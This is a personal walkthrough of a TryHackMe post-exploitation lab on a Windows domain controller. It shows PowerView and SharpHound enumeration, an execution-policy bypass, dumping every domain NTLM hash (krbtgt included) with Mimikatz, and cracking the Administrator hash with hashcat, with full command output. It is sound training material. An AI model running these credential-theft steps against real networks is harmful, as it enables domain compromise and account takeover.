THM - Post Exploitation Basics
Introduction
This room will cover all of the basics of post-exploitation; we’ll talk about everything from post-exploitation enumeration with PowerView and Bloodhound, dumping hashes and golden ticket attacks with Mimikatz, basic information gathering using Windows Server tools and logs, and then we will wrap up this room talking about the basics of maintaining access with the Metasploit persistence module and creating a backdoor into the machine to get an instant meterpreter shell if the system is ever shut down or reset.
Enumeration w/ Powerview
PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various Windows “net *” commands, which use PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality. PowerView can be used to enumerate a domain after you have already gained a shell on the system.
We are told to log into the machine through SSH or RDP with the credentials given in the task description. I’ll use SSH since I’m a lazy mf and I don’t want to install additional software.
$ ssh Administrator@10.10.169.239
We can see that the machine is a Windows machine and that the domain name is controller.
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
controller\administrator@DOMAIN-CONTROLL C:\Users\Administrator>
Start Powershell with
C:\Users\Administrator> powershell -ep bypass
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Administrator>
-ep bypass sets the execution policy of this PowerShell session to Bypass, so scripts run without the policy blocking them. Let’s assume we have already transferred PowerView into the Downloads folder of the compromised machine. We can import its functions by dot-sourcing the script:
PS C:\Users\Administrator> . .\Downloads\PowerView.ps1
We can now enumerate the domain users: all the users stored on a domain controller rather than the computer the user is logged into.
PS C:\Users\Administrator> Get-NetUser | select cn
cn
--
Administrator
Guest
krbtgt
Machine-1
Admin2
Machine-2
SQL Service
POST{REDACTED}
sshd
Enumerate the domain groups whose name contains “admin”:
PS C:\Users\Administrator> Get-NetGroup -GroupName *admin*
Administrators
Hyper-V Administrators
Storage Replica Administrators
Schema Admins
Enterprise Admins
Domain Admins
Key Admins
Enterprise Key Admins
DnsAdmins
Here are some useful cheat sheets:
- https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
- https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview
Enumeration w/ Bloodhound
Bloodhound is a graphical interface that allows you to visually map out the network. It works together with SharpHound, its collector, which, similarly to PowerView, takes the users, groups, trusts, etc. of the network and collects them into .json files to be imported into Bloodhound.
Bloodhound installation
Let’s assume we have already transferred SharpHound onto the compromised machine. On our own machine we have to install Bloodhound and start its neo4j database:
$ sudo apt-get install bloodhound
$ sudo neo4j console
We can now access the neo4j console at http://localhost:7474 with the default credentials neo4j:neo4j.
Getting loot w/ SharpHound
Execute SharpHound with
PS C:\Users\Administrator> . .\Downloads\SharpHound.ps1
Let’s collect all the information available from the compromised host. The resulting loot.zip can then be dragged into the Bloodhound interface to import it:
PS C:\Users\Administrator> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
Dumping hashes w/ Mimikatz
Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside an Active Directory network.
We’ll be focusing on dumping the NTLM (NT LAN Manager) hashes with Mimikatz and then cracking those hashes using hashcat.
Dump Hashes w/ Mimikatz
Let’s run the Mimikatz executable:
C:\Users\Administrator> cd Downloads && mimikatz.exe
  .#####.   mimikatz 2.2.0 (x64) #18362 May  2 2020 16:23:51
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/
Make sure that Mimikatz is running as an administrator, otherwise it will not work properly: privilege::debug requests the SeDebugPrivilege that the later commands need, and it is only granted to an elevated process.
mimikatz # privilege::debug
Privilege '20' OK
Let’s dump the NTLM hashes with
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 5508500012cc005cf7082a9a89ebdfdf
RID : 0000044f (1103)
User : Machine1
LM :
NTLM : 64f12cddaa88057e06a81b54e73b949b
RID : 00000451 (1105)
User : Admin2
LM :
NTLM : 2b576acbe6bcfda7294d6bd18041b8fe
RID : 00000452 (1106)
User : Machine2
LM :
NTLM : c39f2beb3d2ec06a62cb887fb391dee0
RID : 00000453 (1107)
User : SQLService
LM :
NTLM : f4ab68f27303bcb4024650d8fc5f973a
RID : 00000454 (1108)
User : POST
LM :
NTLM : c4b0e1b10c7ce2c4723b4e2407ef81a2
RID : 00000457 (1111)
User : sshd
LM :
NTLM : 2777b7fec870e04dda00cd7260f7bee6
RID : 000003e8 (1000)
User : DOMAIN-CONTROLL$
LM :
NTLM : 15db3a3307f6f5bc574f9ec6832d1680
RID : 00000455 (1109)
User : DESKTOP-2$
LM :
NTLM : 3c2d4759eb9884d7a935fe71a8e0f54c
RID : 00000456 (1110)
User : DESKTOP-1$
LM :
NTLM : 7d33346eeb11a4f12a6c201faaa0d89a
Crack those hashes w/ hashcat
Now we have to save one hash and try to crack it with hashcat in NTLM mode (-m 1000) against the rockyou wordlist. I’ll obviously crack the Administrator one.
$ hashcat -m 1000 2777b7fec870e04dda00cd7260f7bee6 /usr/share/wordlists/rockyou.txt
2777b7fec870e04dda00cd7260f7bee6:P@$$W0rd
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: 2777b7fec870e04dda00cd7260f7bee6
Time.Started.....: Thu Sep 1 14:32:27 2022 (3 secs)
Time.Estimated...: Thu Sep 1 14:32:30 2022 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3727.1 kH/s (0.23ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10762240/14344384 (75.03%)
Rejected.........: 0/10762240 (0.00%)
Restore.Point....: 10760192/14344384 (75.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: PAKITA&edin/LOVE -> P22880D
ET VOILÀ.